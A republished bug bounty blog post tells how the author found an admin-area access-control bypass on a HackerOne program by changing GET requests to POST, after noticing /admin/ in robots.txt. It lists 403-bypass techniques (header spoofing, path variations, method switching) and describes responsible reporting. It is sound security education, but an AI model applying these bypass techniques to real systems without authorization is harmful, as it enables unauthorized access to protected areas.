Ad

Your Brand Here

Your Brand Here — Reach a focused audience of ethical hackers and security researchers

My First Bug Bounty - How I Earned $1,000 With One Simple Step

Kailasv Kailasv

Oct 2, 2025

My First Bug Bounty - How I Earned $1,000 With One Simple Step

This blog was originally published here by Kailasv


Bug bounty hunting had been on my radar for a while. After reading dozens of write-ups and diving into HackerOne’s documentation, I finally decided to go hands-on. This is the story of how I discovered a subtle yet impactful vulnerability that led to my first $1,000 bounty, and the lessons I learned along the way.


Laying the Groundwork

Like most people stepping into this space, I started with the essentials: reading success stories, understanding common vulnerabilities, and exploring the HackerOne platform. I took time to understand how experienced researchers approached targets and documented their findings.


Once I felt confident with the fundamentals, I picked a public program on HackerOne — let’s call it TargetApp — that I found interesting and mature. It was well-tested, so I knew it wouldn’t be easy, but I also saw it as a chance to learn how hardened applications behave under scrutiny.

• • •

Early Exploration and the Quiet Phase

I began with basic reconnaissance:

  • Inspecting the site manually
  • Reviewing robots.txt for hidden paths
  • Testing common vulnerabilities like XSS, open redirects, and IDORs
  • Using Burp Suite to analyze requests and responses

I experimented with various endpoints, looked at how input was handled, and observed the app’s behavior closely.


For nearly two months, I found nothing significant. The application had strong protections in place and clearly had been through multiple rounds of security assessments. It was a bit quiet on the bug front — Manh.. i was frustrated, but I stayed consistent.

The Breakthrough: Re-reading robots.txt

One day, while revisiting earlier notes, I decided to check robots.txt again. I’d reviewed it before, but this time I slowed down and gave it a closer look. Among the disallowed paths, one stood out.

Disallow: /admin/

It’s not unusual for sensitive routes to appear in robots.txt, but this caught my attention. There wasn’t anything directly exploitable here, but it was a clue. I decided to explore it further.

I intercepted a request to /admin/ in Burp Suite and forwarded it. The server returned:

403 Forbidden

A forbidden response — meaning the resource existed, but access was blocked.

That was promising.

• • •

Trying Bypass Techniques

At this point, I explored different 403 bypass techniques. My checklist included:

  • Modifying headers like X-Original-Method, X-Forwarded-For, Referer
  • Trying path variations (/admin/., /admin/%2e/)
  • Using different user agents
  • Switching HTTP methods

That last one — changing the request method — is what made the difference.


I modified the intercepted GET request to /admin/ and changed the method to POST. Then I forwarded it.


To my surprise, the response was:

200 OK

The forbidden page was now accessible.

Expanding the Discovery

I applied the same method to other admin-related routes:

  • /admin/users

Every endpoint that previously returned 403 Forbidden to GET requests responded successfully when accessed via POST.


At this point, I didn’t try to interact with the functionality or escalate further. I had demonstrated access to authenticated or protected areas through a method bypass, and that was enough to report.


Submitting the Report

I submitted a clear and concise report via HackerOne, including:

  • A summary of the issue
  • Affected endpoints
  • Steps to reproduce using Burp Suite
  • Screenshots and proof-of-concept requests
  • A note on the potential impact

Within a few days, the triage team acknowledged the report. Not long after, it was resolved — and I received the notification:

Lessons Learned

Here are some key takeaways from this experience:

  1. Revisit and Reobserve Things you’ve already looked at can hold value when approached with a fresh mindset. robots.txt didn’t seem useful at first—but it ended up being the breadcrumb that led to the discovery.

  2. Understand How Servers Handle Methods The difference in how GET and POST are handled across routes can expose logic flaws or access control issues. Knowing when to try alternative methods is a key part of bypass strategy.

  3. Manual Testing Beats Automation for Logic Flaws Automated tools didn’t catch this. It took manual attention, creative thinking, and strategic probing.

  4. Consistency Pays Off Bug bounty success isn’t usually instant. This took time, patience, and repeated effort — but the reward was well worth it.


Final Thoughts

This wasn’t just a $1,000 bounty — it was a validation that I was on the right track. The process of exploration, failure, and eventually success gave me a deeper appreciation for how web applications are secured — and how they can still be vulnerable in subtle ways.

To add your blog, send an email to [email protected]